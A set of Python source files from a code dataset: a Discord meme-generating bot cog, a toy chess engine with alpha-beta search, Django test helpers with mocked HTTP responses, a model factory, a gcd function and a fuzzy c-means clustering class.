(max 179 chars)\")\n\n meme_format = Image.open('memes/floor.png')\n\n # == Text ==\n fnt = ImageFont.truetype('Arial.ttf', 30)\n d = ImageDraw.Draw(meme_format)\n\n margin = 20\n offset = 25\n for line in textwrap.wrap(f'The floor is {what}', width=65):\n d.text((margin, offset), line, font=fnt, fill=(0,) * 3)\n offset += fnt.getsize(line)[1]\n\n # == Avatars ==\n first = img.resize((20, 20))\n second = img.resize((40, 40))\n\n meme_format.paste(first, (143, 135))\n meme_format.paste(second, (465, 133))\n\n # == Sending ==\n bio = io.BytesIO()\n meme_format.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='floor.png'))\n\n # noinspection PyUnresolvedReferences\n @commands.command(aliases=['car'])\n async def highway(self, ctx, img: AvatarOrOnlineImageOrText,\n first_option, *, second_option):\n \"\"\"Generate a \"Left Exit 12 Off Ramp\" meme.\"\"\"\n\n img, _ = img\n\n if len(first_option) > 54 or len(second_option) > 54:\n return await ctx.send(\"Your options can't be that long. (Max 54)\")\n\n meme_format = Image.open('memes/highway.jpg')\n\n # == Text one ==\n fnt = ImageFont.truetype('Arial.ttf', 22)\n d = ImageDraw.Draw(meme_format)\n\n margin = 165\n offset = 80\n for line in textwrap.wrap(first_option, width=9):\n d.text((margin, offset), line, font=fnt, fill=(255,) * 3)\n offset += fnt.getsize(line)[1]\n\n # == Text two ==\n\n margin = 380\n offset = 80\n for line in textwrap.wrap(second_option, width=9):\n d.text((margin, offset), line, font=fnt, fill=(255,) * 3)\n offset += fnt.getsize(line)[1]\n\n # == Image ==\n meme_format.paste(img.resize((50, 50)), (340, 430))\n\n # == Sending ==\n bio = io.BytesIO()\n meme_format.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='floor.png'))\n\n @commands.command()\n async def wheeze(self, ctx, *, message: str):\n \"\"\"Generate a wheeze meme.\"\"\"\n\n if len(message) > 10:\n return await ctx.send(\n \"Can't do more than 10 characters because reasons\"\n )\n\n meme_format = Image.open('memes/wheeze.png')\n\n # == Text ==\n fnt = ImageFont.truetype('Arial.ttf', 20)\n d = ImageDraw.Draw(meme_format)\n\n d.text((34, 483), message, font=fnt, fill=(0,) * 3)\n\n # == Sending ==\n bio = io.BytesIO()\n meme_format.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='wheeze.png'))\n\n # noinspection PyUnresolvedReferences\n @commands.command(aliases=['garbage'])\n async def trash(self, ctx, first: AvatarOrOnlineImage,\n *, second: AvatarOrOnlineImage):\n \"\"\"Generate a taking out the trash meme.\"\"\"\n\n if isinstance(first, str):\n if len(first) > 6:\n return await ctx.send(\n \"Can't do more than 6 characters because reasons\"\n )\n\n if isinstance(second, str):\n if len(second) > 25:\n return await ctx.send(\n \"Can't do more than 6 characters because reasons\"\n )\n\n meme_format = Image.open('memes/garbage.jpg')\n meme_format = meme_format.convert('RGBA')\n\n # == Text/Avatars 1==\n if isinstance(first, str):\n fnt = ImageFont.truetype('Arial.ttf', 50)\n d = ImageDraw.Draw(meme_format)\n\n margin = 440\n offset = 35\n for line in textwrap.wrap(first, width=4):\n d.text((margin, offset), line, font=fnt, fill=(255,) * 3)\n offset += fnt.getsize(line)[1]\n else:\n first = first.resize((180, 180))\n first = first.rotate(20, expand=True)\n meme_format.paste(first, (390, 15), first)\n\n # == Text/Avatars 2 ==\n if isinstance(second, str):\n fnt = ImageFont.truetype('Arial.ttf', 50)\n d = ImageDraw.Draw(meme_format)\n\n margin = 720\n offset = 170\n for line 
in textwrap.wrap(second, width=5):\n d.text((margin, offset), line, font=fnt, fill=(0,) * 3)\n offset += fnt.getsize(line)[1]\n else:\n second = second.resize((250, 250))\n second = second.rotate(-10, expand=True)\n meme_format.paste(second, (620, 150), second)\n\n # == Sending ==\n bio = io.BytesIO()\n meme_format.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='floor.png'))\n\n @commands.command()\n async def captcha(self, ctx, img: AvatarOrOnlineImageOrText,\n *, message=None):\n \"\"\"Generate a select all \"\"\"\n\n img, name = img\n name = re.sub(r'\\W', '', name).lower()\n name = message or name\n\n meme_format = Image.open('memes/captcha.png')\n\n # == Images ==\n img = img.resize((129, 129))\n\n for x_mul in range(3):\n for y_mul in range(3):\n meme_format.paste(img, (27 + 129 * x_mul, 173 + 129 * y_mul))\n\n # == Text ==\n fnt = ImageFont.truetype('Arial.ttf', 30)\n d = ImageDraw.Draw(meme_format)\n\n d.text((51, 90), name, font=fnt, fill=(255,) * 3)\n\n # == Sending ==\n bio = io.BytesIO()\n meme_format.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='floor.png'))\n\n @commands.command('spam')\n async def who_did_this(self, ctx, search=3):\n \"\"\"Find out who spammed a help command.\n\n Specifically for the dbots server.\n\n Search is how far to go before hitting a bot.\"\"\"\n final_results = []\n\n async for m in ctx.channel.history(limit=search):\n if m.author.bot:\n # We probably found the end of the train\n async for bot_m in ctx.channel.history(before=m):\n if not bot_m.author.bot:\n # Start of the train\n final_results.append((bot_m.author, bot_m.content))\n async for others_m in ctx.channel.history(\n limit=5, before=bot_m\n ):\n final_results.append(\n (others_m.author, others_m.content)\n )\n return await ctx.send(\n '\\n'.join(\n f'**{commands.clean_content().convert(r[0].display_name)}:** {commands.clean_content().convert(r[1])}'\n for r in final_results\n )\n )\n\n\ndef setup(bot):\n bot.add_cog(Other(bot))\n","sub_path":"cogs/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":16176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"553145147","text":"\nfrom itertools import chain\n\nimport pst\n\n\n# some symbols\nup = -10\ndn = 10\nrt = 1\nlt = -1\n\nE = []\nP = [up, up * 2, up + lt, up + rt]\nN = [up * 2 + rt, up + rt * 2, dn + rt * 2, dn * 2 + rt,\n dn * 2 + lt, dn + lt * 2, up + lt * 2, up * 2 + lt]\nB = [up + rt, dn + rt, dn + lt, up + lt]\nR = [up, rt, dn, lt]\nQ = [up, up + rt, rt, dn + rt, dn, dn + lt, lt, up + lt]\nK = Q\n\nempty = ['.']\nborder = [' ', '\\n']\nray = ['.', 'p', 'n', 'b', 'r', 'q', 'k']\n\nr64 = list(\n chain(\n range(21, 29), range(31, 39),\n range(41, 49), range(51, 59),\n range(61, 69), range(71, 79),\n range(81, 89), range(91, 99)\n )\n)\n\nvec = {\n ' ': E, '.': E, '\\n': E,\n 'p': E, 'n': E, 'b': E, 'r': E, 'q': E, 'k': E,\n 'P': P, 'N': N, 'B': B, 'R': R, 'Q': Q, 'K': K\n}\n\nmat = {\n ' ': 0, '.': 0, '\\n': 0,\n 'p': -pst.P, 'n': -pst.N,\n 'b': -pst.B, 'r': -pst.R,\n 'q': -pst.Q, 'k': -pst.K,\n 'P': pst.P, 'N': pst.N,\n 'B': pst.B, 'R': pst.R,\n 'Q': pst.Q, 'K': pst.K\n}\n\npiece = {\n ' ': E, '.': E, '\\n': E,\n 'p': pst.bpawn, 'n': pst.bknight,\n 'b': pst.bbishop, 'r': pst.brook,\n 'q': pst.bqueen, 'k': pst.bking,\n 'P': pst.wpawn, 'N': pst.wknight,\n 'B': pst.wbishop, 'R': pst.wrook,\n 'Q': pst.wqueen, 'K': pst.wking\n}\n\noff = 96\nrow = 10\n\n# node constructor\n\n\nclass Node():\n\n def 
__init__(self,b=None,mov=None):\n if b == None:\n self.b =\\\n \" \\n\" * 2 +\\\n \" rnbqkbnr\\n\" +\\\n \" pppppppp\\n\" +\\\n \" ........\\n\" * 4 +\\\n \" PPPPPPPP\\n\" +\\\n \" RNBQKBNR\\n\" +\\\n \" \\n\" * 2\n else:\n self.b = b\n self.mov = mov\n self.double = []\n self.passant = None\n self.castle = []\n self.score = 0\n\n\n\ndef flip(b):\n b = list(b[::-1])\n for x in range(0, len(b)):\n if x % 10 == 0:\n b[x] = \" \"\n if (x - 9) % 10 == 0:\n b[x] = \"\\n\"\n b[x] = b[x].upper() if b[x].islower() else b[x].lower()\n return ''.join(b)\n\n\ndef take_move(node, mov):\n b1 = node.b[0:mov[1]] + node.b[mov[0]] + node.b[mov[1] + 1:len(node.b)]\n return b1[0:mov[0]] + '.' + b1[mov[0] + 1:len(b1)]\n\n\n# for search\n# it=list(range(0,120))\n\n\ndef gen(c, node, pos):\n r = []\n if c in ['P']:\n if node.b[pos + up] in empty:\n r.append(vec[c][0])\n if pos in range(81, 89) and node.b[pos + up] in empty\\\n and node.b[pos + up * 2] in empty:\n r.append(vec[c][1])\n if node.b[pos + up + lt].islower():\n r.append(vec[c][2])\n if node.b[pos + up + rt].islower():\n r.append(vec[c][3])\n elif c in ['N', 'K']:\n for x in range(0, len(vec[c])):\n if node.b[pos + vec[c][x]] in empty or\\\n node.b[pos + vec[c][x]].islower():\n r.append(vec[c][x])\n elif c in ['B', 'R', 'Q']:\n for x in range(0, len(vec[c])):\n y = 1\n while node.b[pos + vec[c][x] * y] in ray:\n if node.b[pos + vec[c][x] * y] == '.':\n r.append(vec[c][x] * y)\n elif node.b[pos + vec[c][x] * y].islower():\n r.append(vec[c][x] * y)\n break\n else:\n break\n y += 1\n return r\n\n\ndef generate(node):\n return [(x, x + y) for x in r64 for y in gen(node.b[x], node, x)]\n\n\ndef order(par, g, turn, d):\n n = []\n for x in range(len(g)):\n n.append(Node(take_move(par, g[x]), g[x]))\n #ha.update(n[x].b.encode('utf-8'))\n try:\n n[x].score = trans[n[x].b]\n if turn == False:\n n[x].score *= (-1)\n except KeyError:\n n[x].score = mscore(n[x]) + pscore(n[x])\n\n trans[n[x].b] = n[x].score\n return sorted(n, key=lambda x: x.score, reverse=turn)\n\n\ndef mscore(node):\n return sum(list(map(lambda char: mat[char], node.b)))\n\n\ndef pscore(node):\n score = 0\n for x in range(0, len(node.b)):\n if x in r64 and node.b[x] not in empty + border:\n score += piece[node.b[x]][x]\n return score\n\n\ndef ab(node, depth, a, b, turn):\n global ncount, max_count\n if depth == 0:\n ncount += 1\n try:\n score = trans[node.b]\n if turn == False:\n score *= (-1)\n except KeyError:\n score = mscore(node) + pscore(node)\n #print(score)\n\n trans[node.b] = score\n return score\n g = order(node, generate(node), turn, depth)\n if turn:\n v = -pst.K * 3\n bmove = g[0].mov\n for x in g:\n if ncount >= max_count:\n return (v, bmove) if depth == max_depth else v\n v = max(v, ab(x, depth - 1, a, b, not turn))\n if v > a:\n a = v\n if depth == max_depth:\n bmove = x.mov\n if b <= a:\n break\n return (v, bmove) if depth == max_depth else v\n else:\n v = pst.K * 3\n bmove = g[0].mov\n for x in g:\n if ncount >= max_count:\n return (v, bmove) if depth == max_depth else v\n v = min(v, ab(x, depth - 1, a, b, not turn))\n if v < b:\n b = v\n if depth == max_depth:\n bmove = x.mov\n if b <= a:\n break\n return (v, bmove) if depth == max_depth else v\n\n\ndef mtdf(root, f, d):\n global ncount, max_count\n g = f\n upper = pst.Q\n lower = -pst.Q\n while lower < upper:\n b = g + 1 if g == lower else g\n result = ab(root, d, b - 1, b, True)\n if ncount >= max_count:\n return result\n g = result[0]\n if g < b:\n upper = g\n else:\n lower = g\n return result\n\n\n# I/O\n\n\ndef 
your_move():\n return input(\"your move: \").lower()\n\n\ndef ai_move():\n pass\n\n\ndef io_to_co(io):\n return ((ord(io[0]) - off) + ((row - int(io[1])) * row), (ord(io[2]) - off) + ((row - int(io[3])) * row))\n\n# main logic\nbest_move = None\ntrans = {}\nmax_depth = 7\nroot = Node()\nturn = True\ncounter = 0\nmax_count = 10e3\n\n\nwhile True:\n\n if turn == True:\n ncount = 0\n ai=mtdf(root, 0, max_depth)\n #ai = ab(root, max_depth, -pst.K*3, pst.K*3, turn)\n root.b = take_move(root, ai[1])\n print(root.b)\n turn = not turn\n counter += 1\n\n elif turn == False:\n ncount = 0\n root.b = flip(root.b)\n ai=mtdf(root, 0, max_depth)\n #ai = ab(root, max_depth, -pst.K, pst.K, turn)\n root.b = flip(take_move(root, ai[1]))\n print(root.b)\n turn = not turn\n counter += 1\n\n if counter == 8:\n break\n","sub_path":"chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629480355","text":"import os\n\ncurrentpath = os.path.abspath('.')\n\ntestDir = os.path.join(currentpath,'testDir')\nos.mkdir(testDir)\n#os.rmdir(testDir)\nfilepath = os.path.abspath('test.txt')\nfileNewPath = os.path.join(testDir,os.path.split(filepath)[1])\n\n\nf = open(fileNewPath,'w')\n\nwith open('test.txt','r') as f1:\n\tf.write(f1.read())\n\n\n","sub_path":"pythonBase/fileDir.py","file_name":"fileDir.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"371531441","text":"from contextlib import contextmanager\nfrom functools import partial\nimport urlparse\n\nfrom django.core.cache import get_cache\nfrom django.core.handlers.wsgi import WSGIHandler\nfrom django.test.signals import template_rendered\nfrom django.test.client import RequestFactory, store_rendered_templates\nfrom mock import patch\nfrom unittest2 import TestCase\nfrom webtest import TestApp\n\nfrom .builder import ListBuilder\nfrom .core.builders import companies\nfrom .environments.builders import environments\nfrom .products.builders import products\nfrom .responses import response, make_identity, make_error\nfrom .static.builders import codevalues\nfrom .users.builders import users\n\n\n\ndef fill_cache(cache, values_dict):\n \"\"\"\n Fill a mock cache object with some keys and values.\n\n \"\"\"\n cache.get.side_effect = lambda k, d=None: values_dict.get(k, d)\n\n\n\ndef setup_responses(http, response_dict):\n \"\"\"\n Setup a mock http object with some responses to given\n URLs. 
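# A self-contained sketch of the stubbing idiom documented here (toy
# names and URLs, standard-library mock -- not part of the original test
# suite): `side_effect` on a Mock routes each request to a canned
# (response, content) pair keyed by full URI.
from unittest import mock

def stub_http(http, canned):
    # canned maps full URI -> (headers_dict, body_bytes)
    def request(*args, **kwargs):
        return canned[kwargs['uri']]
    http.request.side_effect = request

http = mock.Mock()
stub_http(http, {'http://fake.base/x?_type=json': ({'status': '200'}, b'{}')})
assert http.request(uri='http://fake.base/x?_type=json')[1] == b'{}'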
``response_dict`` should map full URLs (including query string) to\n the (response, content) tuple that will be returned (equivalent to the\n return value of the httplib2.Http.request method).\n\n \"\"\"\n url_dict = dict((Url(k), v) for k, v in response_dict.iteritems())\n def request(*args, **kwargs):\n uri = Url(kwargs[\"uri\"])\n try:\n return url_dict[uri]\n except KeyError:\n return response(\n make_error(\n \"Mock got unexpected request URI: %s \\n\"\n \" -- Options are %s --\" % (uri, response_dict.keys())\n ),\n 500)\n\n http.request.side_effect = request\n\n\nCOMMON_RESPONSES = {\n \"http://fake.base/rest/companies/1?_type=json\":\n response(companies.one(\n resourceIdentity=make_identity(id=1, url=\"companies/1\"))),\n \"http://fake.base/rest/users?_type=json\":\n response(users.searchresult({})),\n \"http://fake.base/rest/users/current?_type=json\":\n response(users.one()),\n \"http://fake.base/rest/products?_type=json\":\n response(products.searchresult({})),\n \"http://fake.base/rest/environments?_type=json\":\n response(environments.searchresult({}, {})),\n \"http://fake.base/staticData/values/TESTCYCLESTATUS?_type=json\":\n response(codevalues.array(\n {\"description\": \"DRAFT\", \"id\": 1},\n {\"description\": \"ACTIVE\", \"id\": 2},\n {\"description\": \"LOCKED\", \"id\": 3},\n {\"description\": \"CLOSED\", \"id\": 4},\n {\"description\": \"DISCARDED\", \"id\": 5},\n )),\n \"http://fake.base/staticData/values/TESTRUNSTATUS?_type=json\":\n response(codevalues.array(\n {\"description\": \"DRAFT\", \"id\": 1},\n {\"description\": \"ACTIVE\", \"id\": 2},\n {\"description\": \"LOCKED\", \"id\": 3},\n {\"description\": \"CLOSED\", \"id\": 4},\n {\"description\": \"DISCARDED\", \"id\": 5},\n )),\n \"http://fake.base/staticData/values/TESTCASESTATUS?_type=json\":\n response(codevalues.array(\n {\"description\": \"DRAFT\", \"id\": 1},\n {\"description\": \"ACTIVE\", \"id\": 2},\n {\"description\": \"LOCKED\", \"id\": 3},\n {\"description\": \"CLOSED\", \"id\": 4},\n {\"description\": \"DISCARDED\", \"id\": 5},\n )),\n \"http://fake.base/staticData/values/TESTRUNRESULTSTATUS?_type=json\":\n response(codevalues.array(\n {\"description\": \"PENDING\", \"id\": 1},\n {\"description\": \"PASSED\", \"id\": 2},\n {\"description\": \"FAILED\", \"id\": 3},\n {\"description\": \"BLOCKED\", \"id\": 4},\n {\"description\": \"STARTED\", \"id\": 5},\n {\"description\": \"INVALIDATED\", \"id\": 6},\n )),\n \"http://fake.base/staticData/values/APPROVALSTATUS?_type=json\":\n response(codevalues.array(\n {\"description\": \"PENDING\", \"id\": 1},\n {\"description\": \"APPROVED\", \"id\": 2},\n {\"description\": \"REJECTED\", \"id\": 3},\n )),\n \"http://fake.base/staticData/values/ATTACHMENTTYPE?_type=json\":\n response(codevalues.array(\n {\"description\": \"BRANDING\", \"id\": 1},\n {\"description\": \"DESIGN\", \"id\": 2},\n {\"description\": \"USERGUIDE\", \"id\": 3},\n {\"description\": \"REQUIREMENTS\", \"id\": 4},\n {\"description\": \"KNOWNISSUES\", \"id\": 5},\n {\"description\": \"SCREENCAPTURE\", \"id\": 6},\n {\"description\": \"NDA\", \"id\": 7},\n {\"description\": \"UNSPECIFIED\", \"id\": 8},\n )),\n }\n\n\ndef setup_common_responses(http, response_dict):\n \"\"\"\n A version of ``setup_responses`` intended for end-to-end request-response\n testing. 
Automatically knows how to respond to the StaticCompanyMiddleware\n query for the current company, and to static data requests.\n\n \"\"\"\n new_dict = COMMON_RESPONSES.copy()\n new_dict.update(response_dict)\n return setup_responses(http, new_dict)\n\n\n\n@contextmanager\ndef locmem_cache():\n cache = get_cache(\"django.core.cache.backends.locmem.LocMemCache\")\n cache.clear()\n patcher = patch(\"ccui.core.cache.cache\", cache)\n patcher.start()\n yield cache\n patcher.stop()\n\n\n\nclass CachingFunctionalTestMixin(object):\n def setUp(self):\n self.cache = get_cache(\"django.core.cache.backends.locmem.LocMemCache\")\n self.cache.clear()\n self.patcher = patch(\"ccui.core.cache.cache\", self.cache)\n self.patcher.start()\n self.addCleanup(self.patcher.stop)\n\n\n\ndef creds(email, password=None, cookie=None):\n from ccui.users.auth import UserCredentials\n from ccui.users.models import User\n creds = UserCredentials(email, password=password, cookie=cookie)\n creds._user = User(email=email)\n creds._user.auth = creds\n creds._permission_codes = []\n return creds\n\n\n\nclass AuthTestCase(TestCase):\n def creds(self, email, password=None, cookie=None):\n return creds(email, password, cookie)\n\n\n @property\n def auth(self):\n \"\"\"\n Since the server responses are mocked, we could just ignore auth when\n not testing it specifically, but we include it for all requests to more\n closely match real usage.\n\n \"\"\"\n return self.creds(\"admin@example.com\", cookie=\"USERTOKEN: authcookie\")\n\n\n\nclass ViewTestCase(AuthTestCase):\n factory = RequestFactory()\n\n\n def setUp(self):\n self.rendered = {}\n on_template_render = partial(store_rendered_templates, self.rendered)\n template_rendered.connect(on_template_render)\n self.addCleanup(template_rendered.disconnect, on_template_render)\n\n\n def setup_responses(self, http, response_dict=None, user=None):\n if user is None:\n user = self.auth.user\n if response_dict is None:\n response_dict = {}\n else:\n response_dict = response_dict.copy()\n response_dict.setdefault(\n \"http://fake.base/rest/users/current?_type=json\",\n response(\n users.one(\n email=user.email,\n firstName=user.firstName,\n lastName=user.lastName,\n screenName=user.screenName\n )\n )\n )\n setup_common_responses(http, response_dict)\n\n\n @property\n def app(self):\n class AuthWSGIHandler(WSGIHandler):\n def get_response(self_, request):\n request._cached_user = self.auth.user\n request._cached_auth = self.auth\n return super(AuthWSGIHandler, self_).get_response(request)\n return TestApp(AuthWSGIHandler())\n\n\n\nclass ResourceTestCase(AuthTestCase):\n @property\n def resource_class(self):\n if not hasattr(self, \"_resource_class\"):\n self._resource_class = self.get_resource_class()\n\n return self._resource_class\n\n\n def get_resource_class(self):\n raise NotImplementedError\n\n\n @property\n def resource_list_class(self):\n if not hasattr(self, \"_resource_list_class\"):\n self._resource_list_class = self.get_resource_list_class()\n\n return self._resource_list_class\n\n\n def get_resource_list_class(self):\n raise NotImplementedError\n\n\n def assertSameResource(self, res1, res2):\n self.assertEqual(res1._location, res2._location)\n\n\n def assertSameResourceList(self, list1, list2):\n self.assertEqual(\n [r._location for r in list1],\n [r._location for r in list2],\n )\n\n\n\nclass TestResourceTestCase(ResourceTestCase):\n builder = ListBuilder(\n \"testresource\",\n \"testresources\",\n \"Testresource\",\n { \"name\": \"Default name\" })\n\n\n def 
get_resource_class(self):\n from ccui.core.api import RemoteObject, fields\n\n def filter_callable(vals):\n return (\"callableFilter\", [v+\"foo\" for v in vals])\n\n class TestResource(RemoteObject):\n name = fields.Field()\n submit_as = fields.Field(api_name=\"submitAs\")\n\n non_field_filters = {\n \"non_field\": \"nonField\",\n \"callable\": filter_callable,\n }\n\n cache = False\n\n def __unicode__(self_):\n return u\"__unicode__ of %s\" % self_.name\n\n return TestResource\n\n\n def get_resource_list_class(self):\n from ccui.core.api import ListObject, fields\n\n class TestResourceList(ListObject):\n entryclass = self.resource_class\n api_name = \"testresources\"\n default_url = \"testresources\"\n\n entries = fields.List(fields.Object(self.resource_class))\n\n cache = False\n\n return TestResourceList\n\n\n\nclass BaseResourceTest(object):\n \"\"\"\n Generic smoke tests that will be run for all resource types.\n\n \"\"\"\n pass\n\n\n\nclass Url(object):\n \"\"\"\n A wrapper class for comparing urls with querystrings while avoiding\n dict-ordering dependencies. Order of keys in querystring should not matter,\n although order of multiple values for a single key does matter.\n\n \"\"\"\n def __init__(self, url):\n self.url = url\n parts = urlparse.urlparse(url)\n self.non_qs = (\n parts.scheme,\n parts.netloc,\n parts.path,\n parts.params,\n parts.fragment)\n # convert values from lists to tuples for hashability later\n self.qs = tuple(sorted((k, tuple(v)) for k, v\n in urlparse.parse_qs(parts.query).iteritems()))\n\n\n def __eq__(self, other):\n return (self.non_qs == other.non_qs) and (self.qs == other.qs)\n\n\n def __hash__(self):\n return hash((self.non_qs, self.qs))\n\n\n def __repr__(self):\n return \"Url(%s)\" % self.url\n","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"195632708","text":"from model_selection.model.light_gbm import LightGbmC\nfrom model_selection.model.xgboost import XgbC\n\n\nclass ClassifierModelFactory(object):\n\n MODEL_LIGHET_GBM = 0\n MODEL_XGBOOST = 1\n MODEL_CAT_BOOST = 2\n MODEL_RANDOM_FOREST = 3\n MODEL_GBR = 4\n MODEL_TENSOR_DNN = 5\n MODEL_TENSOR_LR = 6\n MODEL_KNR = 7\n MODEL_EXTRA_TREE = 8\n MODEL_SGD = 9\n MODEL_LINEAR = 10\n MODEL_SVM_LR = 11\n MODEL_SVM_POLY = 12\n MODEL_SVM_RBF = 13\n MODEL_DECISION_TREE = 14\n\n model_name = {MODEL_LIGHET_GBM: 'light_gbm_c_',\n MODEL_XGBOOST: 'xgboost_c_',\n MODEL_CAT_BOOST: 'cat_boost_c_',\n MODEL_RANDOM_FOREST: 'random_forest_c_',\n MODEL_GBR: 'gb_c_',\n MODEL_TENSOR_DNN: 'tf_dnn_c_',\n MODEL_TENSOR_LR: 'tf_lr_c_',\n MODEL_KNR: 'knn_c_',\n MODEL_EXTRA_TREE: 'extra_tree_c_',\n MODEL_DECISION_TREE: 'decision_tree_c_',\n MODEL_LINEAR: 'linear_c',\n MODEL_SVM_LR: 'svm_lr_c_',\n MODEL_SVM_POLY: 'svm_poly_c_',\n MODEL_SVM_RBF: 'svm_brf_c_',\n MODEL_SGD: 'sgd_c_'}\n\n def create_model(self, argument):\n method_name = 'model_' + str(argument)\n method = getattr(self, method_name, lambda: \"nothing\")\n return method()\n\n def model_0(self):\n return LightGbmC()\n\n def model_1(self):\n return XgbC()\n\n def get_model_name(self, argument):\n return self.model_name[argument]\n\n","sub_path":"model_selection/classifier_model_factory.py","file_name":"classifier_model_factory.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"112690189","text":"def gcd(r1, r2):\n\tif r1 <= 
r2:\n\t\tif r1 == 0:\n\t\t\treturn r2\n\t\telse:\n\t\t\treturn gcd(r2 % r1, r1)\n\telse:\n\t\treturn gcd(r2, r1)\n\nif __name__ == '__main__':\n\tr1 = int(input('en'))\n\tr2 = int(input('sd'))\n\tprint(gcd(r1,r2))","sub_path":"practice/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"460242674","text":"# -*- coding: utf-8 -*-\n\"\"\"Fuzzy C-Means clustering\"\"\"\n\n# Authors: Junyi Li (lijy263@mail2.sysu.edu.cn)\n# License: BSD 3 clause\n# The import part this file is copy from k_means_.py,\n# some functions are not used for now.\nimport numpy as np\n\nfrom ..base import BaseEstimator, ClusterMixin\nfrom ..utils import check_array\nfrom ..utils import check_random_state\n# from ..preprocessing import normalize\n\n\ndef reconstruct_label(labels):\n if len(labels) <= 0:\n return labels\n tmp = []\n for i, xi in enumerate(labels):\n if xi in tmp:\n labels[i] = tmp.index(xi)\n else:\n tmp.append(xi)\n labels[i] = len(tmp) - 1\n return labels\n\n\ndef fcm(X, n_clusters, eps=3, m=2, random_state=None, max_iter=300,\n sample_weight=None):\n \"\"\"Fuzzy CMeans clustering\n\n Parameters\n ----------\n X : array or sparse (CSR) matrix of shape (n_samples, n_features), or \\\n array of shape (n_samples, n_samples)\n\n n_clusters : integer\n The number of seeds to choose\n\n eps : float, optional (default = 3)\n If the sum of the abs of the (new_cluster_probability_matrix \\\n - old_cluster_probability_matrix) is smaller than eps, \\\n then the algorithm will stop.\n\n m : float, optional (default = 2)\n The fuzzy number.\n\n random_state : int, RandomState instance or None (default)\n The generator used to initialize the centers. Use an int to make the\n randomness deterministic.\n\n max_iter : int, optional (default = 300)\n The maximum iteration time for FCM clustering algorthm.\n\n sample_weight : array, shape (n_samples,), optional\n Weight of each sample, such that a sample with a weight of at least\n ``min_samples`` is by itself a core sample; a sample with negative\n weight may inhibit its eps-neighbor from being core.\n Note that weights are absolute, and default to 1.\n\n Returns\n -------\n centroid : float ndarray with shape (n_clusters, n_features)\n Centroids found at the last iteration of fuzzy c-means.\n\n labels : array [n_samples]\n Cluster labels for each point.\n\n \"\"\"\n if m <= 1:\n raise ValueError(\"Invalid number of m.\"\n \" m=%d must be bigger than 1.\" % m)\n if eps <= 0:\n raise ValueError(\"Invalid number of eps.\"\n \" eps=%d must be bigger than 0.\" % eps)\n random_state = check_random_state(random_state)\n\n if max_iter <= 0:\n raise ValueError('Number of iterations should be a positive number,'\n ' got %d instead' % max_iter)\n\n if len(X) < n_clusters:\n n_clusters = len(X)\n\n X = check_array(X, accept_sparse='csr')\n # X = normalize(X)\n membership_mat = np.random.random((len(X), n_clusters))\n membership_mat = membership_mat / np.sum(membership_mat,\n axis=1)[:, np.newaxis]\n\n for iter_time in range(max_iter):\n working_membership_mat = membership_mat ** m\n Centroids = np.dot(working_membership_mat.T,\n X) / np.sum(working_membership_mat.T,\n axis=1)[:, np.newaxis]\n\n n_c_distance_mat = np.zeros((len(X), n_clusters))\n for i, x in enumerate(X):\n for j, c in enumerate(Centroids):\n n_c_distance_mat[i][j] = np.linalg.norm(x - c, 2)\n\n new_membership_mat = np.zeros((len(X), n_clusters))\n\n for i, x in enumerate(X):\n for j, c in 
enumerate(Centroids):\n new_membership_mat[i][j] = 1. / np.sum(\n (\n n_c_distance_mat[i][j] /\n n_c_distance_mat[i]) ** (2 / (m - 1)\n )\n )\n if np.sum(abs(new_membership_mat - membership_mat)) < eps:\n break\n membership_mat = new_membership_mat\n labels = np.argmax(new_membership_mat, axis=1)\n reconstruct_label(labels)\n return Centroids, labels, iter_time\n\n\nclass FCM(BaseEstimator, ClusterMixin):\n \"\"\"Perform fuzzy c-means clustering\n\n Parameters\n ----------\n X : array or sparse (CSR) matrix of shape (n_samples, n_features), or \\\n array of shape (n_samples, n_samples)\n\n n_clusters : integer, optional (default = 3)\n The number of seeds to choose\n\n eps : float, optional (default = 3)\n If the sum of the abs of the (new_cluster_probability_matrix \\\n - old_cluster_probability_matrix) is smaller than eps, \\\n then the algorithm will stop.\n\n m : float, optional (default = 2)\n The fuzzy number.\n\n random_state : int, RandomState instance or None (default)\n The generator used to initialize the centers. Use an int to make the\n randomness deterministic.\n\n max_iter : int, optional (default = 300)\n The maximum iteration time for FCM clustering algorthm.\n\n sample_weight : array, shape (n_samples,), optional\n Weight of each sample, such that a sample with a weight of at least\n ``min_samples`` is by itself a core sample; a sample with negative\n weight may inhibit its eps-neighbor from being core.\n Note that weights are absolute, and default to 1.\n\n Attributes\n ----------\n cluster_centers_ : array, [n_clusters, n_features]\n Coordinates of cluster centers.\n\n labels_ :\n Labels of each point\n\n Notes\n -----\n Now, something remains implementing: sample weighted \\\n section and parallel run the model.\n \"\"\"\n def __init__(self, n_clusters=3, eps=3, m=2, init='random',\n random_state=None, max_iter=300):\n self.n_clusters = n_clusters\n self.init = init\n self.m = m\n self.eps = eps\n self.max_iter = max_iter\n self.random_state = random_state\n\n def _check_test_data(self, X):\n X = check_array(X, accept_sparse='csr')\n n_samples, n_features = X.shape\n expected_n_features = self.cluster_centers_.shape[1]\n if not n_features == expected_n_features:\n raise ValueError(\"Incorrect number of features. \"\n \"Got %d features, expected %d\" % (\n n_features, expected_n_features))\n\n return X\n\n def fit(self, X, y=None, sample_weight=None):\n \"\"\"Compute Fuzzy c-means clustering.\n\n Parameters\n ----------\n X : array-like or sparse matrix, 